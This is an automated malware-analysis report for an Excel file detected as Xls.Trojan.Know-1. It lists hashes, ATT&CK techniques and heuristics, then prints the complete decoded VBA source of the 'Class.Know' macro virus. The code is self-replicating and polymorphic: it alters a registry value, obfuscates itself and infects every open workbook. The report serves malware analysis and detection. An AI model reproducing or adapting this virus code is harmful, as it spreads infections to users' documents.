Office (OLE) malware analysis — malicious · 8dfc1ad1ebd89005

MALICIOUS

Office (OLE)

25.0 KB Created: 1999-08-28 14:11:16 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 46411446d940b7efb8e31bed1731e955 SHA-1: 032b99174d54c8b0d874098bba69fa590c63acf1 SHA-256: 8dfc1ad1ebd890054eaaf0915d3c97e69d8e9fa673a4d6f9d7903e38408b829a

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel file containing obfuscated VBA macros. The macros attempt to use CreateObject to modify the registry key HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6. This indicates an attempt to establish persistence or modify Excel's behavior. The ClamAV detection 'Xls.Trojan.Know-1' further supports its malicious nature.

Heuristics 3

ClamAV: Xls.Trojan.Know-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Know-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11367 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11367 bytes
SHA-256: `87f9788de392e35a2937e692231a181238a0838c52d17217513b9326e0100e3f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DieseArbeitsmappe" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long ' Private Sub Workbook_Deactivate() ' On Error Resume Next: Dim Virus(200) ' Set obj = CreateObject("word.application"): obj.system.privateprofilestring("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: obj.Quit ' Const hostname = "DieseArbeitsmappe" ' Set host = ActiveWorkbook.VBProject.VBComponents(hostname).CodeModule ' OurLines = host.CountOfLines: PiESize = 100 + Int(Rnd * 50): PiEChar = Chr(39) ' For ix = 1 To OurLines: JunkCode = "": PiERnd = Int(Rnd * 3): PiEPos = InStr(host.Lines(ix, 1), PiEChar) ' If PiEPos = 1 And OurLines > PiESize Then PiERnd = 1: GoTo next_ ' Virus(ix) = Left(host.Lines(ix, 1), (PiEPos - 1)) ' For jx = 1 To Int(75 - (Rnd * 20)): JunkCode = JunkCode & Chr(255 - Int(Rnd * 100)): Next ' Virus(ix) = Virus(ix) & PiEChar & JunkCode ' If PiERnd = 2 Then Virus(ix) = Virus(ix) & vbCr & PiEChar & JunkCode ' FullCode = FullCode & Virus(ix) & vbCr ' next_: Next ' Dim VARIABLE(1 To 20) ' VARIABLE(1) = "Virus": VARIABLE(2) = "obj": VARIABLE(3) = "hostname": VARIABLE(4) = "host": VARIABLE(5) = "OurLines": VARIABLE(6) = "PiESize": VARIABLE(7) = "PiEChar": VARIABLE(8) = "ix" ' VARIABLE(9) = "JunkCode": VARIABLE(10) = "PiERnd": VARIABLE(11) = "PiEPos": VARIABLE(12) = "next_": VARIABLE(13) = "jx": VARIABLE(14) = "FullCode": VARIABLE(15) = "VARIABLE": VARIABLE(16) = "OUR_LOOP" ' VARIABLE(17) = "NEW_VAR": VARIABLE(18) = "VAR_POSITION": VARIABLE(19) = "NEXT_LINE": VARIABLE(20) = "target" ' For OUR_LOOP = 1 To 20 ' NEW_VAR = Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22)) & Int(Rnd * 999) ' VAR_POSITION = 1 ' NEXT_LINE: VAR_POSITION = InStr(VAR_POSITION, FullCode, VARIABLE(OUR_LOOP)) ' If VAR_POSITION <> 0 Then FullCode = Mid(FullCode, 1, (VAR_POSITION - 1)) & NEW_VAR & Mid(FullCode, (VAR_POSITION + Len(VARIABLE(OUR_LOOP))), Len(FullCode)): GoTo NEXT_LINE ' Next ' For Each target In Workbooks ' If target.VBProject.VBComponents(hostname).CodeModule.CountOfLines < 2 Then target.VBProject.VBComponents(hostname).CodeModule.AddFromString FullCode ' Next ' If Minute(Now()) = 23 Then MsgBox "know, you never think you know why", 0, "Class.Know by jackie twoflower /Lz0NT /MVT /CC": SwapMouseButton &H2 ' End Sub ' Rem Class.Know written by jackie twoflower /Lz0NT /MVT /CC ' Rem Uses PiE v2.0 for VBA ' Attribute VB_Name = "Tabelle1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Tabelle2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Tabelle3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True ' Processing file: /opt/analyzer/scan_staging/3ef4e5b241c94612b9e0b1049ddf8c0a.bin ' =============================================================================== ' Module streams: ' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 6892 bytes ' Line #0: ' FuncDefn (Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long) ' QuoteRem 0x0053 0x0000 "" ' Line #1: ' FuncDefn (Private Sub Workbook_Deactivate()) ' QuoteRem 0x0021 0x0000 "" ' Line #2: ' OnError (Resume Next) ' BoS 0x0000 ' Dim ' OptionBase ' LitDI2 0x00C8 ' VarDefn Virus ' QuoteRem 0x0024 0x0000 "" ' Line #3: ' SetStmt ' ... (truncated)

SHA-256: 87f9788de392e35a2937e692231a181238a0838c52d17217513b9326e0100e3f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long '
Private Sub Workbook_Deactivate() '
On Error Resume Next: Dim Virus(200) '
Set obj = CreateObject("word.application"): obj.system.privateprofilestring("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: obj.Quit '
Const hostname = "DieseArbeitsmappe" '
Set host = ActiveWorkbook.VBProject.VBComponents(hostname).CodeModule '
OurLines = host.CountOfLines: PiESize = 100 + Int(Rnd * 50): PiEChar = Chr(39) '
For ix = 1 To OurLines: JunkCode = "": PiERnd = Int(Rnd * 3): PiEPos = InStr(host.Lines(ix, 1), PiEChar) '
If PiEPos = 1 And OurLines > PiESize Then PiERnd = 1: GoTo next_ '
Virus(ix) = Left(host.Lines(ix, 1), (PiEPos - 1)) '
For jx = 1 To Int(75 - (Rnd * 20)): JunkCode = JunkCode & Chr(255 - Int(Rnd * 100)): Next '
Virus(ix) = Virus(ix) & PiEChar & JunkCode '
If PiERnd = 2 Then Virus(ix) = Virus(ix) & vbCr & PiEChar & JunkCode '
FullCode = FullCode & Virus(ix) & vbCr '
next_: Next '
Dim VARIABLE(1 To 20) '
VARIABLE(1) = "Virus": VARIABLE(2) = "obj": VARIABLE(3) = "hostname": VARIABLE(4) = "host": VARIABLE(5) = "OurLines": VARIABLE(6) = "PiESize": VARIABLE(7) = "PiEChar": VARIABLE(8) = "ix" '
VARIABLE(9) = "JunkCode": VARIABLE(10) = "PiERnd": VARIABLE(11) = "PiEPos": VARIABLE(12) = "next_": VARIABLE(13) = "jx": VARIABLE(14) = "FullCode": VARIABLE(15) = "VARIABLE": VARIABLE(16) = "OUR_LOOP" '
VARIABLE(17) = "NEW_VAR": VARIABLE(18) = "VAR_POSITION": VARIABLE(19) = "NEXT_LINE": VARIABLE(20) = "target" '
For OUR_LOOP = 1 To 20 '
NEW_VAR = Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22)) & Int(Rnd * 999) '
VAR_POSITION = 1 '
NEXT_LINE: VAR_POSITION = InStr(VAR_POSITION, FullCode, VARIABLE(OUR_LOOP)) '
If VAR_POSITION <> 0 Then FullCode = Mid(FullCode, 1, (VAR_POSITION - 1)) & NEW_VAR & Mid(FullCode, (VAR_POSITION + Len(VARIABLE(OUR_LOOP))), Len(FullCode)): GoTo NEXT_LINE '
Next '
For Each target In Workbooks '
If target.VBProject.VBComponents(hostname).CodeModule.CountOfLines < 2 Then target.VBProject.VBComponents(hostname).CodeModule.AddFromString FullCode '
Next '
If Minute(Now()) = 23 Then MsgBox "know, you never think you know why", 0, "Class.Know by jackie twoflower /Lz0NT /MVT /CC": SwapMouseButton &H2 '
End Sub '
Rem Class.Know written by jackie twoflower /Lz0NT /MVT /CC '
Rem Uses PiE v2.0 for VBA '

Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/3ef4e5b241c94612b9e0b1049ddf8c0a.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 6892 bytes
' Line #0:
' 	FuncDefn (Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long)
' 	QuoteRem 0x0053 0x0000 ""
' Line #1:
' 	FuncDefn (Private Sub Workbook_Deactivate())
' 	QuoteRem 0x0021 0x0000 ""
' Line #2:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x00C8 
' 	VarDefn Virus
' 	QuoteRem 0x0024 0x0000 ""
' Line #3:
' 	SetStmt 
' 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.